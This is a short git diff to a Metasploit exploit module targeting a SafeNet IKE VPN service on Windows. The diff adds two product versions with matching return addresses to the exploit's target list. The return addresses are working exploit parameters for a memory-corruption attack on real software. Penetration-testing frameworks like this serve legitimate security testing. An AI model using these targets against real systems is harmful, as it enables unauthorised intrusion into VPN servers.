diff --git a/modules/exploits/windows/vpn/safenet_ike_11.rb b/modules/exploits/windows/vpn/safenet_ike_11.rb index f33bd91b36..731ab020cc 100644 --- a/modules/exploits/windows/vpn/safenet_ike_11.rb +++ b/modules/exploits/windows/vpn/safenet_ike_11.rb @@ -45,6 +45,8 @@ class Metasploit3 < Msf::Exploit::Remote 'Targets' => [ [ 'SafeNet Irelke 10.8.0.20', { 'Ret' => 0x004514a9 } ], + [ 'SafeNet Irelke 10.8.0.10', { 'Ret' => 0x00451889 } ], + [ 'SafeNet Irelke 10.8.3.6', { 'Ret' => 0x00451929 } ], ], 'DisclosureDate' => 'Jun 1 2009', 'DefaultTarget' => 0))